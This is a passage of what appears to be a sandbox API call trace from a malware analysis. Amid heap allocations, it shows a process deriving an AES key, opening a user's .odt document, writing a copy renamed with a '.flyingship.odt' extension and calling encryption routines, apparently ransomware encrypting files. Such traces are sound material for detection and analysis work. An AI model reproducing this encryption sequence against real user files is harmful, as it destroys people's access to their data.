Flags=0x0, Size=0x8) returned 0x9c2828 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.165] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.165] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.166] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.166] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0173.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.167] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.167] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.168] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.168] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0173.168] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.168] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0173.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.168] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.168] CryptDestroyHash (hHash=0x90af58) returned 1 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.169] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0173.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\us __ 9clmnku6a.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.170] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.170] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0173.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.170] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.171] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.171] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\us __ 9clmnku6a.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0173.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0173.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.173] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.173] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0xde49, lpOverlapped=0x0) returned 1 [0173.176] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.176] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0173.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xde49) returned 0xa7f018 [0173.177] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.177] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0173.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.177] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.178] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.178] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.178] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.178] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.178] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0173.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0173.179] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0173.179] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.179] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.180] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 